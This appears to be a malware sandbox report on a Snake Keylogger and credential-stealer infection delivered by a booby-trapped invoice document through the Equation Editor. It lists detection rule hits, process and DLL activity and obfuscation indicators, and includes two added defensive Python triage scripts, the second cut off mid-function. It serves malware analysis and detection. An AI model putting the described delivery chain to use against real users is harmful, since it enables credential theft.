Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.obi23456.scr.780000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.obi23456.scr.780000.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.obi23456.scr.21b9714.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000009.00000002.374594204.0000000000780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91894CAD.doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, zi--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, zi--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, DarkListView.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, zi--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, zi--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.780000.2.raw.unpack, DarkListView.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, DarkComboBox.cs Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: 9.2.obi23456.scr.780000.2.raw.unpack, DarkComboBox.cs Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winDOCX@6/19@38/6
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$ER DUE INVOICE PAYMENT.docx
Source: C:\Users\user\AppData\Roaming\obi23456.scr Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6F93.tmp
Source: OVER DUE INVOICE PAYMENT.docx OLE indicator, Word Document stream: true
Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obi23456.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: OVER DUE INVOICE PAYMENT.docx ReversingLabs: Detection: 34%
Source: OVER DUE INVOICE PAYMENT.docx Virustotal: Detection: 26%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"
Source: C:\Users\user\AppData\Roaming\obi23456.scr Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"
Source: C:\Users\user\AppData\Roaming\obi23456.scr Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"
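The four process starts above form the chain the Sigma hits describe: Word launches the Equation Editor, the Equation Editor (which only renders formulas and should never create processes) launches a .scr file dropped under the user's profile, and that file relaunches its own image to host the injected payload. The script below is an added example, not sandbox or Sigma code, that applies those rules to parent/child pairs; the events are constructed from the process tree in this report, while the sets of Office binaries, tolerated helper processes and disguised-PE extensions are assumptions to tune per estate.

```python
"""Triage process-creation events for the Office -> Equation Editor -> dropped
payload chain shown in this report. Added example, not Joe Sandbox or Sigma code.
Only the four events in REPORT_EVENTS come from the report; the allowlists and
the extension set are assumptions."""
from __future__ import annotations
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Assumption: helpers an Office process may legitimately start; tune per estate.
OFFICE_HELPERS = {"eqnedt32.exe", "splwow64.exe"}
EQUATION_EDITOR = "eqnedt32.exe"
# Extensions that are PE files in disguise (this report drops obi23456.scr).
DISGUISED_PE_EXT = {".scr", ".pif", ".com"}


def _image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def triage_event(parent_image: str, image: str) -> list[str]:
    """Return the reasons one parent->child start is suspicious (empty if none)."""
    parent, child = _image_name(parent_image), _image_name(image)
    reasons = []
    if parent in OFFICE_APPS and child not in OFFICE_HELPERS:
        reasons.append("Office application spawned a non-Office child")
    if parent == EQUATION_EDITOR:
        # EQNEDT32.EXE renders equations; it has no business creating processes.
        reasons.append("Equation Editor spawned a process (CVE-2017-11882 / CVE-2018-0802 pattern)")
    if "\\appdata\\" in image.lower() and ntpath.splitext(child)[1] in DISGUISED_PE_EXT:
        reasons.append("executable with a screensaver-style extension under the user profile")
    if parent == child:
        # A process that relaunches its own image is the usual RunPE / hollowing host.
        reasons.append("process started a copy of itself")
    return reasons


def triage(events: list[tuple[str, str]]) -> list[tuple[str, list[str]]]:
    """Run triage_event over (parent_image, image) pairs and keep only the hits."""
    hits = []
    for parent_image, image in events:
        reasons = triage_event(parent_image, image)
        if reasons:
            hits.append((image, reasons))
    return hits


# Constructed from the process-start lines of this report.
REPORT_EVENTS = [
    ("unknown", r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"),
    (r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"),
    (r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     r"C:\Users\user\AppData\Roaming\obi23456.scr"),
    (r"C:\Users\user\AppData\Roaming\obi23456.scr",
     r"C:\Users\user\AppData\Roaming\obi23456.scr"),
]

if __name__ == "__main__":
    for image, reasons in triage(REPORT_EVENTS):
        print(image)
        for reason in reasons:
            print("   -", reason)
```

Run against this report's tree, the Word to Equation Editor start is tolerated (it is how OLE embedding works) and both obi23456.scr starts are flagged, the first for the Equation Editor parent and the .scr under AppData, the second for the self-relaunch. Feed it Sysmon Event ID 1 or EDR process-start records with the parent and child image paths to use it as a hunting query.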
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: credssp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ncrypt.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: bcrypt.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: rpcrtremote.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: credssp.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: rpcrtremote.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\obi23456.scr Section loaded: gpapi.dll
Source: OVER DUE INVOICE PAYMENT.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\OVER DUE INVOICE PAYMENT.docx
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\obi23456.scr File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: OVER DUE INVOICE PAYMENT.docx Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: obi23456.scr, 00000009.00000002.374423269.0000000000460000.00000004.08000000.00040000.00000000.sdmp, obi23456.scr, 00000009.00000002.374657544.0000000002161000.00000004.00000800.00020000.00000000.sdmp
Source: OVER DUE INVOICE PAYMENT.docx Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: obb[1].scr.8.dr, ----.cs .Net Code: CreateProvider
Source: obi23456.scr.8.dr, ----.cs .Net Code: CreateProvider
Source: obb[1].scr.8.dr Static PE information: 0x922C3AB8 [Tue Sep 17 22:29:12 2047 UTC]
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_00568F60 push eax; retf 8_2_00568F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_00570F60 push eax; retn 0056h 8_2_00570F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_00574115 push ebp; ret 8_2_00574117
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_0057410D push ebp; ret 8_2_0057410F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_005758DF push ecx; ret 8_2_005758E3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_005758D8 push ecx; ret 8_2_005758DB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_005601F4 push eax; retf 8_2_005601F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_00575880 push ecx; ret 8_2_00575883
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_0056418D push eax; iretd 8_2_0056468E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_005740AD push ecx; ret 8_2_005740AF
Source: obb[1].scr.8.dr Static PE information: section name: .text entropy: 7.37475269907409
Source: obi23456.scr.8.dr Static PE information: section name: .text entropy: 7.37475269907409
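Two of the static indicators above are cheap to reproduce on any dropped PE: the COFF build timestamp 0x922C3AB8 decodes to September 2047, i.e. a forged or garbage link time, and the .text section's entropy of 7.37 bits per byte is close to the 8.0 of random data, which is what packed or encrypted .NET payloads look like. The script below is an added example, not part of the sandbox output: it parses the COFF header and section table with struct, computes Shannon entropy per section and flags both conditions. The PE image it inspects is constructed in memory (DOS header, PE signature, COFF header, one section) so it runs offline, the timestamp is the value the report lists, and the 7.0 entropy threshold and the 2024-07-01 "now" are assumptions of this example.

```python
"""Static triage for two Data Obfuscation indicators: a PE build timestamp in
the future and a high-entropy .text section.

Added example, not part of the sandbox report. The PE image is constructed
in memory (DOS header, PE signature, COFF header, one section) so the checks
run offline; the timestamp value is the one the report lists for obb[1].scr.
"""
import math
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_timestamp(stamp: int) -> datetime:
    """COFF TimeDateStamp is seconds since the Unix epoch, UTC (no 2038 limit here)."""
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=stamp)


def parse_pe(image: bytes) -> dict:
    """Return the COFF timestamp and the entropy of every section's raw data."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
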